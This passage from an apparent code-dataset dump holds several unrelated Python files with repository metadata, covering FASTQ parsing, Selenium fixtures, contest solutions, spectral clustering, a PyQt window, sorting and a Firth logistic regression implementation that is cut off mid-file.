lethal_write(self, read):\n outstring = \"\"\n\n try:\n assert len(read.seq) == len(read.qual)\n except AssertionError:\n self.log.error(\"Sequence and quality scores of different lengths! Read Name {0}; Seq Length {1}; Qual \"\n \"Length {2}\".format(read.name, len(read.seq), len(read.qual)))\n raise SystemExit(1)\n outstring += \"@{0}\\n{1}\\n{2}\\n{3}\\n\".format(read.name, read.seq, read.index, read.qual)\n\n self.file.write(outstring)\n return True\n\n def write(self, read_list):\n \"\"\"\n Write a block of text to new FASTQ file\n :param read_list:\n :return:\n \"\"\"\n outstring = \"\"\n for read in read_list:\n try:\n assert len(read.seq) == len(read.qual)\n except AssertionError:\n self.log.error(\"Sequence and quality scores of different lengths! Read Name {0}; Seq Length {1}; Qual \"\n \"Length {2}\".format(read.name, len(read.seq), len(read.qual)))\n raise SystemExit(1)\n outstring += \"@{0}\\n{1}\\n{2}\\n{3}\\n\".format(read.name, read.seq, read.index, read.qual)\n\n self.file.write(outstring)\n read_list.clear()\n\n return True\n\n def close(self):\n \"\"\"\n Close the FASTQ file\n :return:\n \"\"\"\n self.file.close()\n return True\n\n\nclass FASTQ_Reader:\n __slots__ = ['input_file', 'log', 'name', 'seq', 'index', 'qual', 'read_block', 'file_name', 'fq_file']\n\n def __init__(self, input_file, log=None):\n \"\"\"\n Splits the FASTQ read list from the FASTQ Iterator into the lines to be manipulated. Also does a check to make\n sure the sequence length = quality string length.\n :param input_file:\n :return:\n \"\"\"\n\n self.name = None\n self.seq = None\n self.index = None\n self.qual = None\n self.input_file = input_file\n self.log = log\n self.read_block = []\n self.file_name = ntpath.basename(input_file)\n self.fq_file = self.__fastq_file()\n\n def __fastq_file(self):\n \"\"\"\n Handles opening the FASTQ file\n :return:\n \"\"\"\n if len(self.input_file) < 3:\n self.log.warning(\"FASTQ file parameter missing from options file. Correct error and try again.\")\n raise SystemExit(1)\n\n elif not pathlib.Path(self.input_file).is_file():\n self.log.warning(\"FASTQ file {0} not found. Correct error and run again.\".format(self.input_file))\n raise SystemExit(1)\n\n try:\n mime_type = magic.from_file(self.input_file, mime=True).decode()\n except AttributeError:\n mime_type = magic.from_file(self.input_file, mime=True)\n\n if \"text\" in mime_type:\n fq_file = open(self.input_file, 'rU')\n elif \"gzip\" in mime_type:\n fq_file = gzip.open(self.input_file, 'rt', encoding='utf-8')\n else:\n self.log.warning(\"Unsupported file-type for {0}. Only TEXT or GZIP Allowed.\".format(self.input_file))\n raise SystemExit(1)\n return fq_file\n\n def line_reader(self):\n \"\"\"\n Part of the generator to read the FASTQ files\n \"\"\"\n for line in self.fq_file:\n while True:\n yield line\n\n def seq_read(self):\n \"\"\"\n generator to get sequence reads from FAST file into the appropriate blocks of 4 lines.\n \"\"\"\n read_block = []\n count = 0\n eof = False\n try:\n # for i in range(4):\n while count < 4:\n read_block.append(next(FASTQ_Reader.line_reader(self)))\n count += 1\n except StopIteration:\n eof = True\n\n if len(read_block) == 4 and not eof:\n\n self.name = read_block[0].strip(\"\\n\").strip(\"@\")\n self.seq = read_block[1].strip(\"\\n\").strip()\n self.index = read_block[2].strip(\"\\n\").strip()\n self.qual = read_block[3].strip(\"\\n\").strip()\n\n if len(self.seq) != len(self.qual):\n self.log.error(\"Sequence and quality scores of different lengths! \\n{0:s}\\n{1:s}\\n{2:s}\\n{3:s}\"\n .format(self.name, self.seq, self.index, self.qual))\n raise ValueError(\"Sequence and quality scores of different lengths! \\n{0:s}\\n{1:s}\\n{2:s}\\n{3:s}\"\n .format(self.name, self.seq, self.index, self.qual))\n yield self\n\n # I am using this as my EOF. Not so sure the code ever reaches this.\n self.name = None\n\n\ndef read_trim(fastq_read, trim5=None, trim3=None):\n \"\"\"\n Trim any additional sequences\n :param fastq_read:\n :param trim5:\n :param trim3:\n \"\"\"\n if trim5 and trim3:\n fastq_read.seq = fastq_read.seq[trim5:-trim3]\n fastq_read.qual = fastq_read.qual[trim5:-trim3]\n elif trim5:\n fastq_read.seq = fastq_read.seq[trim5:]\n fastq_read.qual = fastq_read.qual[trim5:]\n elif trim3:\n fastq_read.seq = fastq_read.seq[:-trim3]\n fastq_read.qual = fastq_read.qual[:-trim3]\n","repo_name":"Gaorav-Gupta-Lab/Volundr","sub_path":"Valkyries/FASTQ_Tools_old.py","file_name":"FASTQ_Tools_old.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"74168535791","text":"from selenium import webdriver\nfrom pagesOjects.AuthentificationPageObjects import AuthentificationPageObject\nfrom Util.BrowserFactory import WebdriverFactory\n\nwebdriverFactory = WebdriverFactory()\n\ndef browser_chrome(context, timeout=30, **kwargs):\n\n browser = webdriverFactory.browserFactory('chrome')\n browser.maximize_window()\n\n authentification = AuthentificationPageObject(browser)\n context.authentification = authentification\n\n yield context.authentification\n browser.quit()","repo_name":"ziedhannachi/Selenium-Behave-Python","sub_path":"features/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"1440608966","text":"# D - Prediction and Restriction\n\nN, K = map(int, input().split())\nR, S, P = map(int, input().split())\nT = [t for t in str(input())]\nU = [''] * N\npoint = 0\n\nfor i in range(N):\n if i < K:\n if T[i] == 'r':\n U[i], point = 'P', point + P\n elif T[i] == 's':\n U[i], point = 'R', point + R\n elif T[i] == 'p':\n U[i], point = 'S', point + S\n else:\n if T[i] == 'r':\n if U[i - K] != 'P':\n U[i], point = 'P', point + P\n elif T[i] == 's':\n if U[i - K] != 'R':\n U[i], point = 'R', point + R\n elif T[i] == 'p':\n if U[i - K] != 'S':\n U[i], point = 'S', point + S\n\nprint(point)\n","repo_name":"muck0120/contest","sub_path":"AtCoder/ABC/149/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71225674031","text":"from .sknw import mark, parse_struc, build_graph, draw_graph, build_sknw\n\n__version__ = '0.1'\n\n__all__ = ['mark', 'parse_struc', 'build_graph', 'draw_graph', 'build_sknw']\n\n\ndef test():\n from skimage.morphology import skeletonize\n import numpy as np\n from skimage import data\n import matplotlib.pyplot as plt\n\n img = data.horse()\n ske = skeletonize(~img).astype(np.uint16)\n graph = build_sknw(ske)\n plt.imshow(img, cmap='gray')\n for (s,e) in graph.edges():\n ps = graph[s][e]['pts']\n plt.plot(ps[:,1], ps[:,0], 'green')\n\n nodes = graph.nodes()\n ps = np.array([nodes[i]['o'] for i in nodes])\n plt.plot(ps[:,1], ps[:,0], 'r.')\n plt.title('Build Graph')\n plt.show()\n","repo_name":"Image-Py/sknw","sub_path":"sknw/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":197,"dataset":"github-code","pt":"38"} +{"seq_id":"12993540171","text":"#!/usr/bin/env python3\n\n\"\"\"Logs a `Pinhole` archetype for roundtrip checks.\"\"\"\n\nfrom __future__ import annotations\n\nimport argparse\n\nimport rerun as rr\n\n\ndef main() -> None:\n parser = argparse.ArgumentParser(description=\"Logs rich data using the Rerun SDK.\")\n rr.script_add_args(parser)\n args = parser.parse_args()\n\n rr.script_setup(args, \"rerun_example_roundtrip_pinhole\")\n\n rr.log(\n \"pinhole\",\n rr.Pinhole(image_from_camera=[[3.0, 0.0, 0.0], [0.0, 3.0, 0.0], [1.5, 1.5, 1.0]], resolution=[3840, 2160]),\n )\n\n rr.script_teardown(args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rerun-io/rerun","sub_path":"tests/python/roundtrips/pinhole/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":3502,"dataset":"github-code","pt":"38"} +{"seq_id":"6720519445","text":"from django.core.management.base import BaseCommand\nfrom django.utils import timezone\n\nfrom search.models import SearchResult\n\n\nclass Command(BaseCommand):\n\n help = 'uploads latest search results into elasticsearch'\n\n def add_arguments(self, parser):\n parser.add_argument('sync_type', type=str, choices=['create', 'update'], help='ethereum network to use')\n\n def handle(self, *args, **options):\n sync_type = options['sync_type']\n\n if sync_type == 'create':\n for sr in SearchResult.objects.all():\n print(sr.pk)\n try:\n sr.put_on_elasticsearch()\n except Exception as e:\n print('failed:', e)\n elif sync_type == 'update':\n then = timezone.now() - timezone.timedelta(hours=1)\n for sr in SearchResult.objects.filter(modified_on__gt=then):\n print(sr.pk)\n try:\n sr.put_on_elasticsearch()\n except Exception as e:\n print('failed:', e)\n","repo_name":"gitcoinco/web","sub_path":"app/search/management/commands/update_search_index.py","file_name":"update_search_index.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":1747,"dataset":"github-code","pt":"38"} +{"seq_id":"23379054604","text":"\nclass Solution(object):\n\n\tdef numUniqueEmail(self, emails):\n\n\t\tres = []\n\t\tfor email in emails:\n\t\t\tlocal, domain = email.split('@')\n\t\t\tlocal = local.replace('.', '')\n\t\t\tlocal = local.split('+')[0]\n\t\t\tprint(local, domain)\n\t\t\tif local +'@' + domain not in res:\n\t\t\t\tres.append(local+'@'+domain)\n\t\treturn len(res)\n\nA=Solution()\nres=A.numUniqueEmail([\"test.email+alex@leetcode.com\",\"test.email.leet+alex@code.com\"])\nprint(res)","repo_name":"BrianQcq/LeetCode","sub_path":"src/929_unique_email_addr.py","file_name":"929_unique_email_addr.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"74470866669","text":"import numpy as np\nfrom sklearn import datasets, metrics\nfrom utils import Painter4cluster\nfrom sklearn.cluster import KMeans\n\n\nclass Spectral:\n \"\"\"https://arxiv.org/pdf/0711.0189.pdf\n 谱聚类算法过程:\n 1. 根据数据构造graph,每一节点对应一个数据点,边的权重为两点的相似度,以其邻接矩阵W表示\n 2. W每一列元素相加构成一个对角矩阵,记为度矩阵D,把W-D记为拉普拉斯矩阵L\n 3. 求L的前k个特征值及特征向量\n 4. 前k个特征向量组成特征矩阵,用k-mean进行聚类\"\"\"\n\n def __init__(self, n_clusters, n_features=None, show_img=None, painter=None):\n self.n_clusters = n_clusters\n\n self.show_img = show_img\n\n if self.show_img:\n self.painter = painter or Painter4cluster(n_features)\n self.painter.beautify()\n\n if not painter and self.show_img:\n self.painter.init_pic()\n\n def fit_predict(self, data, gamma=1., img_save_path=None):\n n_samples = data.shape[0]\n\n w = np.ones((n_samples, n_samples)) # 邻接矩阵\n\n for i in range(n_samples):\n for j in range(i + 1, n_samples):\n w[i][j] = w[j][i] = self.cal_sim(data[i], data[j], gamma)\n\n d = np.diag(np.sum(w, axis=-1)) # 度矩阵\n l = d - w # 拉普拉斯矩阵\n\n # 拉普拉斯矩阵标准化\n for i in range(n_samples):\n for j in range(i, n_samples):\n l[i, j] /= d[i, i] * d[j, j]\n l[j, i] = l[i, j]\n\n q, v = np.linalg.eig(l) # 特征值和特征向量\n vec = v[:, np.argsort(q)[:self.n_clusters]] # 取前k个特征向量\n\n pred = KMeans(n_clusters=self.n_clusters).fit_predict(vec)\n\n if self.show_img:\n self.painter.show_pic(data, pred, img_save_path)\n self.painter.show()\n\n return pred\n\n def cal_sim(self, x1, x2, gamma):\n \"\"\"高斯核\"\"\"\n return np.exp(- gamma * np.linalg.norm(x1 - x2) ** 2)\n\n\ndef sample_test():\n n_clusters = 5\n x, y = datasets.make_blobs(centers=n_clusters, n_samples=500)\n\n model = Spectral(n_clusters=n_clusters,\n n_features=x.shape[1], show_img=True\n )\n pred = model.fit_predict(x,\n # img_save_path='../img/Spectral.png',\n )\n\n print('ARI:', metrics.adjusted_rand_score(y, pred))\n \"\"\"ARI: 0.980015709384567\"\"\"\n\n\ndef real_data_test():\n from MathMethods.Scaler import scaler\n\n dataset = datasets.load_wine()\n\n x, y = dataset.data, dataset.target\n\n x, _ = scaler.min_max(x)\n\n model = Spectral(n_clusters=3)\n pred = model.fit_predict(x)\n\n print('ARI:', metrics.adjusted_rand_score(y, pred))\n \"\"\"ARI: 0.7970657287606968\"\"\"\n\n\ndef sklearn_test():\n from sklearn.cluster import SpectralClustering\n from sklearn.preprocessing import MinMaxScaler\n\n dataset = datasets.load_wine()\n\n x, y = dataset.data, dataset.target\n\n x = MinMaxScaler().fit_transform(x)\n\n model = SpectralClustering(n_clusters=3)\n pred = model.fit_predict(x)\n\n print('ARI:', metrics.adjusted_rand_score(y, pred))\n \"\"\"ARI: 0.9308728982369983\"\"\"\n\n\nif __name__ == '__main__':\n sample_test()\n # real_data_test()\n # sklearn_test()\n","repo_name":"citisy/MachineLearning","sub_path":"cluster/SpectralCluster.py","file_name":"SpectralCluster.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"} +{"seq_id":"37477920175","text":"from PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtWidgets import QMainWindow, QStackedWidget, QAction, QMessageBox\n\nfrom Screen_ToolSelection import Screen_ToolSelection\n\n\nclass Ui_MainWindow(QMainWindow):\n WIN_WIDTH = 800\n WIN_HEIGHT = 600\n\n CUR_VER = \"v0.2.6\"\n screen_toolselection: Screen_ToolSelection\n\n def setupUi(self, MainWindow):\n # main window attributes\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(self.WIN_WIDTH, self.WIN_HEIGHT)\n # set up the central widget\n self.central_widget = QStackedWidget()\n self.setCentralWidget(self.central_widget)\n MainWindow.setCentralWidget(self.central_widget)\n # set up the menu bar\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, self.WIN_WIDTH, 26))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n # add actions to the menu bar\n self.actionAbout = QAction(\"About\", self)\n self.actionAbout.triggered.connect(self.click_menubar_about)\n self.menubar.addAction(self.actionAbout)\n\n # set up the status bar\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n # note: no se que hace esta wea\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n # init other screens\n self.screen_toolselection = Screen_ToolSelection(self)\n # append screens to the central widget\n self.central_widget.addWidget(self.screen_toolselection)\n # set the starting screen\n self.central_widget.setCurrentWidget(self.screen_toolselection)\n\n self.screen_toolselection.post_load()\n\n def click_menubar_about(self):\n dialog = QMessageBox()\n dialog.setWindowTitle(\"About\")\n dialog.setText(f\"PDFtools {self.CUR_VER}\\nCreated by Mrivem, 2020\")\n dialog.setIcon(QMessageBox.Information)\n dialog.exec_()\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n","repo_name":"mrivem/PDFtools","sub_path":"GUI/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15371602489","text":"def ins_sort(xs: list) -> None:\r\n for i in range(1, len(xs)):\r\n v = xs[i]\r\n j: int = i - 1\r\n while j >= 0:\r\n if xs[j] > v:\r\n xs[j + 1] = xs[j]\r\n j -= 1\r\n else:\r\n break\r\n xs[j + 1] = v\r\n\r\n\r\n# implementation for v in [0 to 0.9999999999]\r\ndef bucket_sort(xs: list, n: int) -> None:\r\n buckets = [[] for _ in range(n)]\r\n for v in xs:\r\n v2 = int(v * n)\r\n buckets[v2].append(v)\r\n print(buckets)\r\n ans = []\r\n for vs in buckets:\r\n ins_sort(vs)\r\n ans = ans + vs\r\n for i, v in enumerate(ans):\r\n xs[i] = v\r\n\r\n\r\nargs = [4, 5, 3, 2, 6, 7]\r\nins_sort(args)\r\nargs = [0.45, 0.76, 0.32, 0.11, 0.69, 0.45]\r\nbucket_sort(args, 2)\r\nprint(args)","repo_name":"rdrf2838/Algorithms","sub_path":"sorting/bucket_sort.py","file_name":"bucket_sort.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"7804274718","text":"import warnings\nfrom copy import deepcopy\nfrom importlib.resources import open_text\nfrom math import sqrt\n\nimport numpy as np\nfrom scipy.linalg import lapack\nfrom scipy.special import expit\nfrom scipy.stats import chi2, norm\nfrom sklearn.base import BaseEstimator, ClassifierMixin\nfrom sklearn.exceptions import ConvergenceWarning\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.utils.multiclass import check_classification_targets\nfrom sklearn.utils.validation import check_is_fitted\nfrom tabulate import tabulate\n\n\nclass FirthLogisticRegression(BaseEstimator, ClassifierMixin):\n \"\"\"\n Logistic regression with Firth's bias reduction method.\n\n This is based on the implementation in the `logistf` R package. Please see the\n `logistf` reference and Heinze & Schemper (2002) for details about the procedure.\n\n Parameters\n ----------\n max_iter\n The maximum number of Newton-Raphson iterations.\n max_halfstep\n The maximum number of step-halvings in one Newton-Raphson iteration.\n max_stepsize\n The maximum step size - for each coefficient, the step size is forced to\n be less than max_stepsize.\n pl_max_iter\n The maximum number of Newton-Raphson iterations for finding profile likelihood\n confidence intervals.\n pl_max_halfstep\n The maximum number of step-halvings in one iteration for finding profile\n likelihood confidence intervals.\n pl_max_stepsize\n The maximum step size while finding PL confidence intervals.\n tol\n Convergence tolerance for stopping.\n fit_intercept\n Specifies if intercept should be added.\n skip_pvals\n If True, p-values will not be calculated. Calculating the p-values can be\n time-consuming if `wald=False` since the fitting procedure is repeated for each\n coefficient.\n skip_ci\n If True, confidence intervals will not be calculated. Calculating the confidence\n intervals via profile likelihoood is time-consuming.\n alpha\n Significance level (confidence interval = 1-alpha). 0.05 as default for 95% CI.\n wald\n If True, uses Wald method to calculate p-values and confidence intervals.\n test_vars\n Index or list of indices of the variables for which to calculate confidence\n intervals and p-values. If None, calculate for all variables. This option has\n no effect if wald=True.\n\n Attributes\n ----------\n bse_\n Standard errors of the coefficients.\n classes_\n A list of the class labels.\n ci_\n The fitted profile likelihood confidence intervals.\n coef_\n The coefficients of the features.\n intercept_\n Fitted intercept. If `fit_intercept = False`, the intercept is set to zero.\n loglik_\n Fitted penalized log-likelihood.\n n_iter_\n Number of Newton-Raphson iterations performed.\n pvals_\n p-values calculated by penalized likelihood ratio tests.\n\n References\n ----------\n Firth D (1993). Bias reduction of maximum likelihood estimates.\n Biometrika 80, 27–38.\n\n Heinze G, Schemper M (2002). A solution to the problem of separation in logistic\n regression. Statistics in Medicine 21: 2409-2419.\n \"\"\"\n\n def __init__(\n self,\n max_iter=25,\n max_halfstep=0,\n max_stepsize=5,\n pl_max_iter=100,\n pl_max_halfstep=0,\n pl_max_stepsize=5,\n tol=0.0001,\n fit_intercept=True,\n skip_pvals=False,\n skip_ci=False,\n alpha=0.05,\n wald=False,\n test_vars=None,\n ):\n self.max_iter = max_iter\n self.max_stepsize = max_stepsize\n self.max_halfstep = max_halfstep\n self.pl_max_iter = pl_max_iter\n self.pl_max_halfstep = pl_max_halfstep\n self.pl_max_stepsize = pl_max_stepsize\n self.tol = tol\n self.fit_intercept = fit_intercept\n self.skip_pvals = skip_pvals\n self.skip_ci = skip_ci\n self.alpha = alpha\n self.wald = wald\n self.test_vars = test_vars\n\n def _more_tags(self):\n return {\"binary_only\": True}\n\n def _validate_input(self, X, y):\n if self.max_iter < 0:\n raise ValueError(\n f\"Maximum number of iterations must be positive; \"\n f\"got max_iter={self.max_iter}\"\n )\n if self.max_halfstep < 0:\n raise ValueError(\n f\"Maximum number of step-halvings must >= 0; \"\n f\"got max_halfstep={self.max_iter}\"\n )\n if self.tol < 0:\n raise ValueError(\n f\"Tolerance for stopping criteria must be positive; got tol={self.tol}\"\n )\n X, y = self._validate_data(X, y, dtype=np.float64, ensure_min_samples=2)\n check_classification_targets(y)\n\n self.classes_ = np.unique(y)\n if len(self.classes_) != 2:\n raise ValueError(f\"Got {len(self.classes_)} - only 2 classes supported.\")\n y = LabelEncoder().fit_transform(y).astype(X.dtype, copy=False)\n\n return X, y\n\n def fit(self, X, y):\n X, y = self._validate_input(X, y)\n if self.fit_intercept:\n X = np.hstack((X, np.ones((X.shape[0], 1))))\n\n self.coef_, self.loglik_, self.n_iter_ = _firth_newton_raphson(\n X, y, self.max_iter, self.max_stepsize, self.max_halfstep, self.tol\n )\n\n self.bse_ = _bse(X, self.coef_)\n\n if not self.skip_ci:\n if not self.wald:\n self.ci_ = _profile_likelihood_ci(\n X=X,\n y=y,\n fitted_coef=self.coef_,\n full_loglik=self.loglik_,\n max_iter=self.pl_max_iter,\n max_stepsize=self.pl_max_stepsize,\n max_halfstep=self.pl_max_halfstep,\n tol=self.tol,\n alpha=self.alpha,\n test_vars=self.test_vars,\n )\n else:\n self.ci_ = _wald_ci(self.coef_, self.bse_, self.alpha)\n else:\n self.ci_ = np.full((self.coef_.shape[0], 2), np.nan)\n\n # penalized likelihood ratio tests\n if not self.skip_pvals:\n if not self.wald:\n self.pvals_ = _penalized_lrt(\n self.loglik_,\n X,\n y,\n self.max_iter,\n self.max_stepsize,\n self.max_halfstep,\n self.tol,\n self.test_vars,\n )\n\n else:\n self.pvals_ = _wald_test(self.coef_, self.bse_)\n else:\n self.pvals_ = np.full(self.coef_.shape[0], np.nan)\n\n if self.fit_intercept:\n self.intercept_ = self.coef_[-1]\n self.coef_ = self.coef_[:-1]\n else:\n self.intercept_ = 0\n\n return self\n\n def summary(self, xname=None, tablefmt=\"simple\"):\n \"\"\"\n Prints a summary table.\n\n Parameters\n ----------\n xname\n Names for the X variables. Default is x1, x2, ... Must match the number of\n parameters in the model.\n tablefmt\n `tabulate` table format for output. Please see the documentation for\n `tabulate` for options.\n \"\"\"\n check_is_fitted(self)\n if xname and len(xname) != len(self.coef_):\n raise ValueError(\n f\"Length of xname ({len(xname)}) does not match the number of \"\n f\"parameters in the model ({len(self.coef_)})\"\n )\n\n if not xname:\n xname = [f\"x{i}\" for i in range(1, len(self.coef_) + 1)]\n\n coef = list(self.coef_)\n if self.fit_intercept:\n xname.append(\"Intercept\")\n coef.append(self.intercept_)\n\n headers = [\n \"\",\n \"coef\",\n \"std err\",\n f\"[{self.alpha/2}\",\n f\"{1-self.alpha/2}]\",\n \"p-value\",\n ]\n table = zip(xname, coef, self.bse_, self.ci_[:, 0], self.ci_[:, 1], self.pvals_)\n table = tabulate(table, headers, tablefmt=tablefmt)\n table += \"\\n\\n\"\n table += f\"Log-Likelihood: {round(self.loglik_, 4)}\\n\"\n table += f\"Newton-Raphson iterations: {self.n_iter_}\\n\"\n print(table)\n if self.fit_intercept:\n xname.pop()\n return\n\n def decision_function(self, X):\n check_is_fitted(self)\n X = self._validate_data(X, reset=False)\n scores = X @ self.coef_ + self.intercept_\n return scores\n\n def predict(self, X):\n decision = self.decision_function(X)\n if len(decision.shape) == 1:\n indices = (decision > 0).astype(int)\n else:\n indices = decision.argmax(axis=1)\n return self.classes_[indices]\n\n def predict_proba(self, X):\n decision = self.decision_function(X)\n if decision.ndim == 1:\n decision = np.c_[-decision, decision]\n proba = expit(decision)\n return proba\n\n\ndef _firth_newton_raphson(X, y, max_iter, max_stepsize, max_halfstep, tol, mask=None):\n # see logistf reference manual for explanation of procedure\n coef = np.zeros(X.shape[1])\n for iter in range(1, max_iter + 1):\n preds = expit(X @ coef)\n XW = _get_XW(X, preds, mask)\n\n fisher_info_mtx = XW.T @ XW\n hat = _hat_diag(XW)\n U_star = np.matmul(X.T, y - preds + np.multiply(hat, 0.5 - preds))\n step_size = np.linalg.lstsq(fisher_info_mtx, U_star, rcond=None)[0]\n # if mask:\n # step_size[mask] = 0\n\n # step-halving\n mx = np.max(np.abs(step_size)) / max_stepsize\n if mx > 1:\n step_size = step_size / mx # restrict to max_stepsize\n coef_new = coef + step_size\n preds_new = expit(X @ coef_new)\n loglike = _loglikelihood(X, y, preds)\n loglike_new = _loglikelihood(X, y, preds_new)\n steps = 0\n while loglike < loglike_new:\n step_size *= 0.5\n coef_new = coef + step_size\n preds_new = expit(X @ coef_new)\n loglike_new = _loglikelihood(X, y, preds_new)\n steps += 1\n if steps == max_halfstep:\n warning_msg = \"Step-halving failed to converge.\"\n warnings.warn(warning_msg, ConvergenceWarning, stacklevel=2)\n return coef_new, -loglike_new, iter\n\n if iter > 1 and np.linalg.norm(coef_new - coef) < tol:\n return coef_new, -loglike_new, iter\n\n coef += step_size\n warning_msg = (\n \"Firth logistic regression failed to converge. Try increasing max_iter.\"\n )\n warnings.warn(warning_msg, ConvergenceWarning, stacklevel=2)\n return coef, -loglike_new, max_iter\n\n\ndef _loglikelihood(X, y, preds):\n # penalized log-likelihood\n XW = _get_XW(X, preds)\n fisher_info_mtx = XW.T @ XW\n penalty = 0.5 * np.log(np.linalg.det(fisher_info_mtx))\n return -1 * (np.sum(y * np.log(preds) + (1 - y) * np.log(1 - preds)) + penalty)\n\n\ndef _get_XW(X, preds, mask=None):\n # mask is 1-indexed because 0 == None\n rootW = np.sqrt(preds * (1 - preds))\n XW = rootW[:, np.newaxis] * X\n\n # is this equivalent??\n # https://github.com/georgheinze/logistf/blob/master/src/logistf.c#L150-L159\n if mask is not None:\n XW[:, mask] = 0\n return XW\n\n\ndef _get_aug_XW(X, preds, hats):\n rootW = np.sqrt(preds * (1 - preds) * (1 + hats))\n XW = rootW[:, np.newaxis] * X\n return XW\n\n\ndef _hat_diag(XW):\n # Get diagonal elements of the hat matrix\n qr, tau, _, _ = lapack.dgeqrf(XW, overwrite_a=True)\n Q, _, _ = lapack.dorgqr(qr, tau, overwrite_a=True)\n hat = np.einsum(\"ij,ij->i\", Q, Q)\n return hat\n\n\ndef _bse(X, coefs):\n # se in logistf is diag(object$var) ^ 0.5, where var is the covariance matrix,\n # which is the inverse of the observed fisher information matrix\n # https://stats.stackexchange.com/q/68080/343314\n preds = expit(X @ coefs)\n XW = _get_XW(X, preds)\n fisher_info_mtx = XW.T @ XW\n return np.sqrt(np.diag(np.linalg.pinv(fisher_info_mtx)))\n\n\ndef _penalized_lrt(\n full_loglik, X, y, max_iter, max_stepsize, max_halfstep, tol, test_vars\n):\n if test_vars is None:\n test_var_indices = range(X.shape[1])\n elif isinstance(test_vars, int): # single index\n test_var_indices = [test_vars]\n else: # list, tuple, or set of indices\n test_var_indices = sorted(test_vars)\n\n pvals = []\n for mask in test_var_indices:\n _, null_loglik, _ = _firth_newton_raphson(\n X,\n y,\n max_iter,\n max_stepsize,\n max_halfstep,\n tol,\n mask,\n )\n pvals.append(_lrt(full_loglik, null_loglik))\n if len(pvals) < X.shape[1]:\n pval_array = np.full(X.shape[1], np.nan)\n for idx, test_var_idx in enumerate(test_var_indices):\n pval_array[test_var_idx] = pvals[idx]\n return pval_array\n return np.array(pvals)\n\n\ndef _lrt(full_loglik, null_loglik):\n # in logistf: 1-pchisq(2*(fit.full$loglik-fit.i$loglik),1)\n lr_stat = 2 * (full_loglik - null_loglik)\n p_value = chi2.sf(lr_stat, df=1)\n return p_value\n\n\ndef _predict(X, coef):\n preds = expit(X @ coef)\n np.clip(preds, a_min=1e-15, a_max=1 - 1e-15, out=preds)\n return preds\n\n\ndef _profile_likelihood_ci(\n X,\n y,\n fitted_coef,\n full_loglik,\n max_iter,\n max_stepsize,\n max_halfstep,\n tol,\n alpha,\n test_vars,\n):\n LL0 = full_loglik - chi2.ppf(1 - alpha, 1) / 2\n lower_bound = []\n upper_bound = []\n if test_vars is None:\n test_var_indices = range(fitted_coef.shape[0])\n elif isinstance(test_vars, int): # single index\n test_var_indices = [test_vars]\n else: # list, tuple, or set of indices\n test_var_indices = sorted(test_vars)\n for side in [-1, 1]:\n # for coef_idx in range(fitted_coef.shape[0]):\n for coef_idx in test_var_indices:\n coef = deepcopy(fitted_coef)\n for iter in range(1, max_iter + 1):\n preds = _predict(X, coef)\n loglike = -_loglikelihood(X, y, preds)\n XW = _get_XW(X, preds)\n hat = _hat_diag(XW)\n XW = _get_aug_XW(X, preds, hat) # augmented data using hat diag\n fisher_info_mtx = XW.T @ XW\n U_star = np.matmul(X.T, y - preds + np.multiply(hat, 0.5 - preds))\n # https://github.com/georgheinze/logistf/blob/master/src/logistf.c#L780-L781\n inv_fisher = np.linalg.pinv(fisher_info_mtx)\n tmp1x1 = U_star @ np.negative(inv_fisher) @ U_star\n underRoot = (\n -2\n * ((LL0 - loglike) + 0.5 * tmp1x1)\n / (inv_fisher[coef_idx, coef_idx])\n )\n lambda_ = 0 if underRoot < 0 else side * sqrt(underRoot)\n U_star[coef_idx] += lambda_\n\n step_size = np.linalg.lstsq(fisher_info_mtx, U_star, rcond=None)[0]\n mx = np.max(np.abs(step_size)) / max_stepsize\n if mx > 1:\n step_size = step_size / mx # restrict to max_stepsize\n coef += step_size\n loglike_old = deepcopy(loglike)\n\n for halfs in range(1, max_halfstep + 1):\n preds = _predict(X, coef)\n loglike = -_loglikelihood(X, y, preds)\n if (abs(loglike - LL0) < abs(loglike_old - LL0)) and loglike > LL0:\n break\n step_size *= 0.5\n coef -= step_size\n if abs(loglike - LL0) <= tol:\n if side == -1:\n lower_bound.append(coef[coef_idx])\n else:\n upper_bound.append(coef[coef_idx])\n break\n if abs(loglike - LL0) > tol:\n if side == -1:\n lower_bound.append(np.nan)\n else:\n upper_bound.append(np.nan)\n warning_msg = (\n f\"Non-converged PL confidence limits - max number of \"\n f\"iterations exceeded for variable x{coef_idx}. Try \"\n f\"increasing 